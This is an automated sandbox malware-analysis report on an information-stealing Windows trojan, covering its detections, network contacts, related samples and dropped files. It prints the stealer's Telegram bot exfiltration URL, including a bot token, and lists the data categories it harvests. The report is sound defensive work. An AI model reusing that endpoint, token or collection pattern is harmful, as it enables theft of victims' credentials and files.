Command and Control: 1 Web Service; 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label
cOQD62FceM.exe | 50% | ReversingLabs | Win32.Trojan.Generic
cOQD62FceM.exe | 54% | Virustotal |
cOQD62FceM.exe | 100% | Avira | HEUR/AGEN.1353232
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
ipwho.is | 0% | Virustotal |
api.telegram.org | 2% | Virustotal |
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400 | 1% | Virustotal |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
https://docs.rs/getrandom#nodejs-es-module-supportCalling | 0% | Virustotal |
https://cdn.ipwhois.io/flags/us.svg | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 195.201.57.90 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400 | cOQD62FceM.exe, 00000000.00000003.2590558371.00000190BA826000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606869052.00000190BA826000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdn.ipwhois.io/flags/us.svg% | cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id= | cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ipwhois.io/flags/us.svg | cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-supportCalling | cOQD62FceM.exe | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
195.201.57.90 | ipwho.is | Germany | 24940 | HETZNER-ASDE | false
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1450352
                  Start date and time:2024-06-01 18:49:46 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 19s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:cOQD62FceM.exe
                  renamed because original name is a hash value
                  Original Sample Name:17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd.exe
                  Detection:MAL
                  Classification:mal96.troj.spyw.evad.winEXE@4/14@2/2
                  EGA Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  149.154.167.220Clipper.exeGet hashmaliciousUnknownBrowse
                    Cryptor.exeGet hashmaliciousLuca StealerBrowse
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                        9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                            SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Attachments.zipGet hashmaliciousUnknownBrowse
                                DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                                  hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                    sipari#U015f formu_831512.exeGet hashmaliciousAgentTeslaBrowse
                                      195.201.57.90Clipper.exeGet hashmaliciousUnknownBrowse
                                      • /?output=json
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • /?output=json
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • /?output=json
                                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                                      • /?output=json
                                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                                      • /?output=json
                                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • /?output=json
                                      3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                                      • ipwhois.app/xml/
                                      KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                      • ipwhois.app/xml/
                                      file.exeGet hashmaliciousBlackGuardBrowse
                                      • ipwhois.app/xml/
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ipwho.isClipper.exeGet hashmaliciousUnknownBrowse
                                      • 195.201.57.90
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • 195.201.57.90
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 195.201.57.90
                                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                                      • 195.201.57.90
                                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                                      • 195.201.57.90
                                      KR6nDu9fLhop1bFe.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 195.201.57.90
                                      http://nxxoui9ah5qto.pages.dev/smart89Get hashmaliciousUnknownBrowse
                                      • 195.201.57.90
                                      01vwXiyQ8K.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      api.telegram.orgClipper.exeGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • 149.154.167.220
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 149.154.167.220
                                      9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 149.154.167.220
                                      ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                                      • 149.154.167.220
                                      SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 149.154.167.220
                                      Attachments.zipGet hashmaliciousUnknownBrowse
                                      • 149.154.167.220
                                      DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                      • 149.154.167.220
                                        | sipariş formu_831512.exe | malicious | AgentTesla | 149.154.167.220
                                       Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                       TELEGRAMRU | Clipper.exe | malicious | Unknown | 149.154.167.220
                                        | Cryptor.exe | malicious | Luca Stealer | 149.154.167.220
                                        | Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220
                                        | SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe | malicious | CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | 149.154.167.99
                                        | 9JVOOyGBXT.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
                                        | ajb5QcGVGK.exe | malicious | DCRat | 149.154.167.220
                                        | http://www.aviatorx.sbs.recl.cc/ | malicious | Unknown | 149.154.167.99
                                        | http://telegram-vn.com/ | malicious | Unknown | 149.154.167.99
                                        | http://dl.dir.freefiremobile.com.sg5.putrivpn.biz.id/ | malicious | Unknown | 149.154.167.99
                                        | http://b9824.top/ | malicious | Unknown | 149.154.170.96
                                       HETZNER-ASDE | Clipper.exe | malicious | Unknown | 195.201.57.90
                                        | Cryptor.exe | malicious | Luca Stealer | 195.201.57.90
                                        | Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | 195.201.57.90
                                        | SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe | malicious | CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | 159.69.102.132
                                        | 3Lf408k9mg.exe | malicious | PureLog Stealer, SystemBC | 116.202.102.103
                                        | PAYMENT RECEIPT.exe | malicious | FormBook | 178.63.50.103
                                        | RFQ price list.scr.exe | malicious | Unknown | 88.99.137.18
                                        | Revised Order.exe | malicious | DarkTortilla, FormBook | 135.181.212.206
                                        | RFQ price list.scr.exe | malicious | Unknown | 88.99.137.18
                                       Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                       3b5074b1b5d032e5620f69f9f700ff0e | Clipper.exe | malicious | Unknown | 149.154.167.220
                                        | Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | 149.154.167.220
                                        | SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe | malicious | AsyncRAT, DcRat | 149.154.167.220
                                        | Authenticator.exe | malicious | BazaLoader | 149.154.167.220
                                        | Payment Advice Ref 20240516908654223454899.scr.exe | malicious | Unknown | 149.154.167.220
                                        | Aviz de Plata_Comert_Bank_pdf.scr.exe | malicious | Unknown | 149.154.167.220
                                        | IKwhIZp9xe.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
                                        | Aviz de Plata_Comert_Bank_pdf.scr.exe | malicious | Unknown | 149.154.167.220
                                        | Biodu Kenya Ltd.exe | malicious | Unknown | 149.154.167.220
                                        | file.exe | malicious | AgentTesla | 149.154.167.220
                                      No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.773832331134527
                                      Encrypted:false
                                      SSDEEP:3:NlllulD/:NllUD
                                      MD5:D9ADDC8BC71EE61261940D67A7EFF73A
                                      SHA1:44DABE2479B4D251FC348A7198B3F5665BC48F5C
                                      SHA-256:3945C70445A1C3E3E162F1EE5EBBD03C93D3D4483316AE2AF1D9C025D0B204A7
                                      SHA-512:87100FEF4AB233A92DD99E02668390D1C546DEB0DB9E1E7C470E1AC9D63A36C64081E31262786128526FF2FE223E883DBF338587A55A961F6CB7C38A419967AE
                                      Malicious:false
                                      Reputation:low
                                      Preview:@...e.................................R.........................
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):286
                                      Entropy (8bit):5.7588025104123
                                      Encrypted:false
                                      SSDEEP:6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
                                      MD5:07691E9F2983932701060D0FC5588075
                                      SHA1:878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
                                      SHA-256:7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
                                      SHA-512:399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
                                      Malicious:false
                                      Reputation:low
                                      Preview:.google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):946062
                                      Entropy (8bit):7.579026396072125
                                      Encrypted:false
                                      SSDEEP:12288:Y6y+RxAj5C4S3alnLooVrD550To7wCusv/XCcA/8zWLJrD7c6kMB:Y6f0JuQLDVj7f/XWme
                                      MD5:FA14806DE0A47A371E812939E90B9DE4
                                      SHA1:34E42A9BBC1D4DE5EBBC5C5BE1699FCB41C5F5F1
                                      SHA-256:D8327A332B5A7DF5CCA3325BB0158242F86009E41E08C0FFFF3895D1FA418123
                                      SHA-512:44242D8866944C8F424C95F2681A050997670EE136ABE5D60E7AA74659D63E3B5CEA8FBAA257E59FAA8FD6FDD0D6AE695360F516516AEB363C43CD2CF85D80F4
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR................C..oUIDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):29967
                                      Entropy (8bit):7.844352900924057
                                      Encrypted:false
                                      SSDEEP:768:nkKkSnynTSoacScocQk5/kKkSnynScoa7ScocL8:nkKkSnynlCcocQkNkKkSnyn+lcocQ
                                      MD5:25B555D9B19ACFF815941C2CD455D62D
                                      SHA1:B78FBE19038EAA8C7BA61CC42CD4DC74F732337B
                                      SHA-256:BB9513E6C63F62E7D323C879488B0ED00B5E00FB78B18EC0FE8342977550D6BE
                                      SHA-512:1CDB078500B65771307580340AF72D501E490A8D4C7B13B178EE49230AF3CD6A38844682F032925A6589114BFEA0CBA5A85ACBEEEB47C2B7EE890269F3FE7E47
                                      Malicious:false
                                      Reputation:low
                                      Preview:PK...........X...s............BJZFPPWAPT.docx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........X...s............BJZFPPWAPT.xlsx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):669
                                      Entropy (8bit):5.355364439931774
                                      Encrypted:false
                                      SSDEEP:12:eM36nIQN3eyQ8bjx6YYbrJFz1eXOlQM7NlVa1JBQM3aWfgyIHdAMij01+ajXaBLF:exVNbxxVYBvIHM7NlVafe8dOAMijUlqD
                                      MD5:1609FFB86FC6AC8A96E2BCFE39C4F217
                                      SHA1:4223B49D1A9943D4C8BB9C7CB2A8C21944664450
                                      SHA-256:0035BB7FB3F3A4831A32CD1F56174995E453A1EE53B2F44B1AD9DD654B66A463
                                      SHA-512:DEAAD1BA9DF21F4A73786C6C98AECD8F52E51483724DF8FB36FF4C22D98D83B7CBDA2905D6AEF8BAE94360922E0110E375FB0B67F6E4CB724B94A526DC8FEEC5
                                      Malicious:false
                                      Reputation:low
                                      Preview:..- IP Info -....IP: 173.254.250.91..Country: United States..City: Dallas..Postal: 75201..ISP: Quadranet Enterprises LLC - A8100..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - E26RT4853 (1280, 1024)..HWID: 5059308222394286..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\cOQD62FceM.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 40...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Others: ..
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.6732424250451717
                                      Encrypted:false
                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):155648
                                      Entropy (8bit):0.5407252242845243
                                      Encrypted:false
                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                      Category:dropped
                                      Size (bytes):979916
                                      Entropy (8bit):7.600298847346435
                                      Encrypted:false
                                      SSDEEP:12288:96y+RxAj5C4S3alnLooVrD550To7wCusv/XCcA/8zWLJrD7c6kMvylyi:96f0JuQLDVj7f/XWm0ylyi
                                      MD5:D2026B1DC5D6012C2F258FF0D105038E
                                      SHA1:08B2AA4CADD1846D1E1D9C326D3A2704F02ADAB0
                                      SHA-256:807468EDD99D6C38CCC68B9E47F5694A441264BF625707CFC4AB1C4C62EFFFD6
                                      SHA-512:392DABF0D063DD2ACB82F0B1DAB71A441707D108D637012CEE0F0373363926B0746D53542A4F4482E34790BA29645A645BAE2FADB285834D8995DDA12A158D03
                                      Malicious:false
                                      Preview:PK...........X................Autofill/PK...........X................Cookies/PK...........X................CreditCards/PK...........X................Downloads/PK...........X................History/PK...........X................Passwords/PK...........X..Hh.o...o......screen1.png.PNG........IHDR................C..oUIDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):29967
                                      Entropy (8bit):7.844352900924057
                                      Encrypted:false
                                      SSDEEP:768:nkKkSnynTSoacScocQk5/kKkSnynScoa7ScocL8:nkKkSnynlCcocQkNkKkSnyn+lcocQ
